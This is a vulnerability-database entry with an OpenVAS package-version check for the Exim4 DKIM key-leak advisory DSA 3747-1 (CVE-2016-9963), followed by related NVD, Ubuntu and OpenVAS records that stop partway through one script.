ID OPENVAS:1361412562310703747 Type openvas Reporter Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net Modified 2019-03-18T00:00:00
Description
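Bjoern Jacke discovered that Exim, Debian's default mail transfer agent,
may leak the private DKIM signing key to the log files if specific
configuration options are met.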
# OpenVAS Vulnerability Test
# $Id: deb_3747.nasl 14279 2019-03-18 14:48:34Z cfischer $
# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0
# Script version: 1.0
#
# Author:
# Greenbone Networks
#
# Copyright:
# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Registration phase: when the scanner sets `description`, the script only
# declares its metadata and leaves through exit(0) at the end of this block,
# so none of the package checks further down run in that mode.
if(description)
{
# Identity of the check: OID, revision, the CVE it covers and the display name.
script_oid("1.3.6.1.4.1.25623.1.0.703747");
script_version("$Revision: 14279 $");
script_cve_id("CVE-2016-9963");
script_name("Debian Security Advisory DSA 3747-1 (exim4 - security update)");
script_tag(name:"last_modification", value:"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $");
script_tag(name:"creation_date", value:"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)");
# CVSS v2 score and vector (partial confidentiality impact, high access
# complexity). NOTE(review): the NVD record reproduced further down this page
# rates the same CVE 5.9 / MEDIUM under CVSS v3.0 with C:H, so the 2.6 here is
# the older, lower rating of the same key-disclosure issue.
script_tag(name:"cvss_base", value:"2.6");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:N/C:P/I:N/A:N");
script_tag(name:"solution_type", value:"VendorFix");
# Detection quality is "package": the verdict comes from comparing installed
# package versions, not from probing Exim or reading its configuration.
script_tag(name:"qod_type", value:"package");
script_xref(name:"URL", value:"http://www.debian.org/security/2016/dsa-3747.html");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net");
script_family("Debian Local Security Checks");
# Scheduling: the package list must have been gathered first, and the check is
# only eligible when the SSH login identified a Debian host with a package
# list and a release key matching DEB8 (jessie, per the solution text below).
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages", re:"ssh/login/release=DEB8");
# Human-readable report fields, excerpted from the advisory.
script_tag(name:"affected", value:"exim4 on Debian Linux");
script_tag(name:"solution", value:"For the stable distribution (jessie),
this problem has been fixed in version 4.84.2-2+deb8u2.
We recommend that you upgrade your exim4 packages.");
# NOTE(review): the summary says the leak depends on "specific configuration
# options"; this script does not test for them, so a finding means "affected
# package version installed", not "key confirmed leaked".
script_tag(name:"summary", value:"Bjoern Jacke discovered that Exim,
Debian's default mail transfer agent, may leak the private DKIM signing key to
the log files if specific configuration options are met.");
script_tag(name:"vuldetect", value:"This check tests the installed software
version using the apt package manager.");
# End of registration: return before the include() lines and the checks.
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-deb.inc");
# Package-version check for DSA 3747-1 (CVE-2016-9963) on Debian 8 (DEB8).
#
# Every binary package built from exim4 is compared against the fixed version
# 4.84.2-2+deb8u2 through isdpkgvuln() (pulled in by the include() lines above;
# its body is not shown here, so presumably it returns report text when the
# installed package is older than `ver` and NULL otherwise -- confirm in
# pkg-lib-deb.inc). All non-NULL results are concatenated into one report.
#
# NOTE(review): this is a version comparison only. A clean result says nothing
# about whether a DKIM private key was already written to the log files while
# an affected version was installed; reviewing existing Exim logs and rotating
# the DKIM key on such hosts is a separate follow-up to the package upgrade.
report = "";
res = "";

# Same packages, in the same order, as the advisory-generated check list.
foreach pkg_name (make_list("exim4",
                            "exim4-base",
                            "exim4-config",
                            "exim4-daemon-heavy",
                            "exim4-daemon-heavy-dbg",
                            "exim4-daemon-light",
                            "exim4-daemon-light-dbg",
                            "exim4-dbg",
                            "exim4-dev",
                            "eximon4")) {
  res = isdpkgvuln(pkg:pkg_name, ver:"4.84.2-2+deb8u2", rls:"DEB8");
  if(res != NULL) {
    report += res;
  }
}

if(report == "") {
  # Nothing outdated was found. __pkg_match is not assigned in this script
  # (presumably set by the package library when a listed package is installed
  # for this release); exit code 99 is the "not vulnerable" result.
  if(__pkg_match) {
    exit(99);
  }
} else {
  # At least one installed package is older than the fixed version.
  security_message(data:report);
}
{"id": "OPENVAS:1361412562310703747", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 3747-1 (exim4 - security update)", "description": "Bjoern Jacke discovered that Exim,\nDebian", "published": "2016-12-25T00:00:00", "modified": "2019-03-18T00:00:00", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703747", "reporter": "Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net", "references": ["http://www.debian.org/security/2016/dsa-3747.html"], "cvelist": ["CVE-2016-9963"], "lastseen": "2019-05-29T18:35:51", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9963"]}, {"type": "ubuntu", "idList": ["USN-3164-1"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_E7002B26CAAA11E6A76A9F7324E5534E.NASL", "ALA_ALAS-2017-804.NASL", "UBUNTU_USN-3164-1.NASL", "DEBIAN_DSA-3747.NASL", "DEBIAN_DLA-762.NASL", "OPENSUSE-2017-980.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106485", "OPENVAS:703747", "OPENVAS:1361412562310843007", "OPENVAS:1361412562310851601"]}, {"type": "amazon", "idList": ["ALAS-2017-804"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3747-1:65DFE", "DEBIAN:DLA-762-1:0D8D2"]}, {"type": "freebsd", "idList": ["E7002B26-CAAA-11E6-A76A-9F7324E5534E"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2289-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889920"]}], "modified": "2019-05-29T18:35:51", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2019-05-29T18:35:51", "rev": 2}, "vulnersScore": 6.3}, "pluginID": "1361412562310703747", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3747.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are 
largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703747\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-9963\");\n script_name(\"Debian Security Advisory DSA 3747-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3747.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n 
script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name:\"summary\", value:\"Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "naslFamily": "Debian Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T20:07:44", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM signing key via vectors related to log files and bounce messages.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-01T15:59:00", "title": "CVE-2016-9963", "type": "cve", "cwe": ["CWE-320"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-02-15T12:47:00", "cpe": ["cpe:/a:exim:exim:4.87", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-9963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.87:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", 
"cpe:2.3:o:canonical:ubuntu_linux:16.10:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-02T11:38:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9963"], "description": "Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In certain \nconfigurations, private DKIM signing keys could be leaked to the log files.", "edition": 5, "modified": "2017-01-05T00:00:00", "published": "2017-01-05T00:00:00", "id": "USN-3164-1", "href": "https://ubuntu.com/security/notices/USN-3164-1", "title": "Exim vulnerability", "type": "ubuntu", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2017-07-24T12:55:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "description": "Bjoern Jacke discovered that Exim,\nDebian", "modified": "2017-07-07T00:00:00", "published": "2016-12-25T00:00:00", "id": "OPENVAS:703747", "href": "http://plugins.openvas.org/nasl.php?oid=703747", "type": "openvas", "title": "Debian Security Advisory DSA 3747-1 (exim4 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3747.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703747);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-9963\");\n script_name(\"Debian Security Advisory DSA 3747-1 (exim4 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3747.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"exim4 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Exim (v4) is a mail transport agent.\nexim4 is the metapackage depending on the essential components for a basic exim4\ninstallation.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name: \"summary\", value: \"Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.\");\n 
script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-01-06T00:00:00", "id": 
"OPENVAS:1361412562310843007", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843007", "type": "openvas", "title": "Ubuntu Update for exim4 USN-3164-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for exim4 USN-3164-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843007\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 05:45:22 +0100 (Fri, 06 Jan 2017)\");\n script_cve_id(\"CVE-2016-9963\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3164-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks 
if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In certain\nconfigurations, private DKIM signing keys could be leaked to the log files.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3164-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/USN-3164-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.82-3ubuntu2.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.82-3ubuntu2.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.87-3ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.87-3ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release 
== \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.76-3ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.76-3ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-2ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-2ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "description": "Exim is prone to an information disclosure vulnerability.", "modified": "2018-11-13T00:00:00", "published": "2016-12-23T00:00:00", "id": "OPENVAS:1361412562310106485", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106485", "type": "openvas", "title": "Exim Information Disclosure Vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_exim_cve_2016_9963.nasl 12338 2018-11-13 14:51:17Z asteins $\n#\n# Exim Information Disclosure Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that 
it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106485\");\n script_version(\"$Revision: 12338 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-13 15:51:17 +0100 (Tue, 13 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 10:52:32 +0700 (Fri, 23 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim Information Disclosure Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SMTP problems\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"If several conditions are met, Exim leaks private information to a remote\nattacker.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may obtain private information.\");\n\n script_tag(name:\"affected\", value:\"Exim 4.69 until 
4.87.\");\n\n script_tag(name:\"solution\", value:\"Update to Exim 4.87.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://bugs.exim.org/show_bug.cgi?id=1996\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.69\", test_version2: \"4.87\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.87.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T18:28:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-08-30T00:00:00", "id": "OPENVAS:1361412562310851601", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851601", "type": "openvas", "title": "openSUSE: Security Advisory for exim (openSUSE-SU-2017:2289-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
